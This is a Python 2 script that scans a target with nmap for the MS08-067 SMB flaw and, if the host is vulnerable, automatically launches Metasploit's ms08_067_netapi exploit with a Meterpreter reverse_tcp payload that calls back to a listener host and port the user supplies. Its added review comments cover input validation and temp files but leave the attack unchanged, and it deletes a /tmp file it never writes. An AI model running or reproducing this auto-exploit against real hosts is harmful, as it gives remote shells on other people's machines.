Python: SMB checker and exploiter ‘MS08-067’

#!/usr/bin/env python
#
# File_Name: SMB checker and exploiter 'MS08-067'
# Written by: Ahmed shawky aka lnxg33k < ahmed@isecur1ty.org >
# Thanks: Dave Relik from #social-engineer --> freenode
# home: live.isecur1ty.org  lnxg33k.wordpress.com
#

import os
import re
import subprocess
import sys
import tempfile

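# The SYN scan (-sS) used below needs raw-socket privileges, so stop early
# without them. The effective UID is what the kernel checks, so test
# geteuid() rather than the real UID.
# NOTE(review): every subprocess started later inherits root, including the
# ones that receive command-line arguments.
if os.geteuid() != 0:
  sys.stderr.write('requires root privileges.\n')
  sys.exit(1)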

def usage():
  """Print the expected command line and exit with status 1 unless exactly
  three arguments (RemoteHost, LocalHost, LocalPort) were supplied."""
  if len(sys.argv) == 4:
    return
  for line in ('Usage: ./smb.py [RemoteHost] [LocalHost] [LocalPort]',
               'EX)    ./smb.py 192.168.1.50 192.168.1.6 443'):
    print line
  sys.exit(1)

# Check the argument count before anything below indexes sys.argv.
usage()

# Start-up banner; the \t escapes expand to tabs inside the box.
banner = """ 
  ************************************************
  **\tSMB checker and exploiter 'MS08-067' \t**
  **\tWritten by: Ahmed Shawky aka lnxg33k \t**
  **\tThanks: Dave Relik @ #social-engineer\t**
  ************************************************
"""
print banner

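# Positional arguments: the remote host, then the local address and port.
RHOST, LHOST, LPORT = sys.argv[1:4]

# These values end up on command lines executed as root, so accept only
# characters that can appear in a host name or IP address, and a numeric TCP
# port. A leading '-' is refused so a value cannot be read as an option, and
# shell metacharacters never reach a command string.
for _label, _value in (('RemoteHost', RHOST), ('LocalHost', LHOST)):
  if not re.match(r'[A-Za-z0-9][A-Za-z0-9._:-]*\Z', _value):
    sys.stderr.write('invalid %s: %r\n' % (_label, _value))
    sys.exit(1)
if not re.match(r'[0-9]{1,5}\Z', LPORT) or not 1 <= int(LPORT) <= 65535:
  sys.stderr.write('invalid LocalPort: %r\n' % LPORT)
  sys.exit(1)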

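# Run the nmap check against RHOST and read back its normal-format report.
#
# A target that looks like an option would be parsed by nmap as one.
if RHOST.startswith('-'):
  sys.stderr.write('invalid RemoteHost: %r\n' % RHOST)
  sys.exit(1)

# The report is written to a file created by mkstemp() (unpredictable name,
# owner-only permissions) rather than a fixed name under /tmp: a fixed name in
# a world-writable directory can be pre-created or symlinked by another local
# user before this root process writes to it.
report_fd, report_path = tempfile.mkstemp(prefix='nmap-', suffix='.txt')
os.close(report_fd)
try:
  # Argument list, no shell: RHOST stays a single argv entry and is never
  # interpreted by /bin/sh.
  nmap = subprocess.call(['nmap', '-sS', '-p445',
                          '--script', 'smb-check-vulns.nse',
                          RHOST, '-oN', report_path])
  with open(report_path, 'rU') as f:
    reader = f.read()
finally:
  os.remove(report_path)

# A scan that failed to run says nothing about the host; do not report it as
# "not vulnerable".
if nmap != 0:
  sys.stderr.write('\nnmap exited with status %d; scan result unknown\n' % nmap)
  sys.exit(1)

# Report line being matched:  "|   MS08-067: VULNERABLE"
found = re.search(r'[|]\s\s\sMS08-067:\sVULNERABLE', reader)
if not found:
  print '\nSystem is not vulnerable'
  sys.exit(1)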

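print '\nLooks like it\'s a vulnerable host'
print 'I will exploit it for you\n'

# Argument list instead of a formatted shell string: RHOST, LHOST and LPORT
# come straight from the command line and this process runs as root, so they
# must not pass through /bin/sh where ';', '|', '$()' etc. would be executed.
try:
  metasploit = subprocess.call([
    'msfcli', 'exploit/windows/smb/ms08_067_netapi',
    'PAYLOAD=windows/meterpreter/reverse_tcp',
    'RHOST=%s' % RHOST,
    'LHOST=%s' % LHOST,
    'LPORT=%s' % LPORT,
    'E',
  ])
except OSError, err:
  # msfcli missing or not executable: report it and carry on to the cleanup
  # below, using the status a shell would have returned for "not found".
  sys.stderr.write('could not run msfcli: %s\n' % err)
  metasploit = 127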

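# NOTE(review): printed unconditionally; the exit status of the previous step
# is not consulted.
print '[**] Nice PWN'

# Delete the scan report with os.remove() instead of spawning a root shell to
# run `rm` (which is resolved through PATH). Like `rm -f`, a report that is
# already gone or cannot be removed does not abort the script.
try:
  os.remove('/tmp/nmap.txt')
except OSError:
  pass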
